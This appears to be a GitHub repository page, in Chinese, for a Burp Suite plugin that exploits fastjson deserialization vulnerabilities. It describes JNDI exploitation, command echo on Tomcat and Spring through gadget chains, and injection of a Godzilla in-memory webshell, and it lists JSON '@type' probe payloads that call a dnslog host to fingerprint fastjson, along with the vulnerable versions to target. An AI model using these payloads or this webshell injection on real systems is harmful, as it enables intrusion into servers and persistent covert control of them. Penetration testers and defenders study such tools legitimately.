Skip to content

fastjson利用,支持tomcat、spring回显,哥斯拉内存马;回显利用链为dhcp、ibatis、c3p0。

Notifications You must be signed in to change notification settings

amaz1ngday/fastjson-exp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

fastjson-exp

fastjson利用,burp插件。 支持出网 jndi利用检测,不出网 tomcat、spring回显,哥斯拉内存马,回显利用链为dhcp、ibatis、c3p0,内存马支持tomcat89

用法

加载到burp插件,自行选择echo、jndi、inject。 探测存在后,发送Repeater自行修改请求头,回显在响应头。如下 image

image

image

测试环境

tomcat启动后,将war包放在webapps目录即(tomcat自带dhcp依赖),漏洞环境为1.2.24和1.2.47。

判断是否使用fastjon组件

dns ● {"@type":"java.net.Inet4Address","val":"dnslog"}

● {"@type":"java.net.Inet6Address","val":"dnslog"}

● {"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

● {{"@type":"java.net.URL","val":"http://dnslog"}:0

● {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}

● Set[{"@type":"java.net.URL","val":"http://dnslog"}]

About

fastjson利用,支持tomcat、spring回显,哥斯拉内存马;回显利用链为dhcp、ibatis、c3p0。

Resources

Stars

Watchers

Forks

Packages

No packages published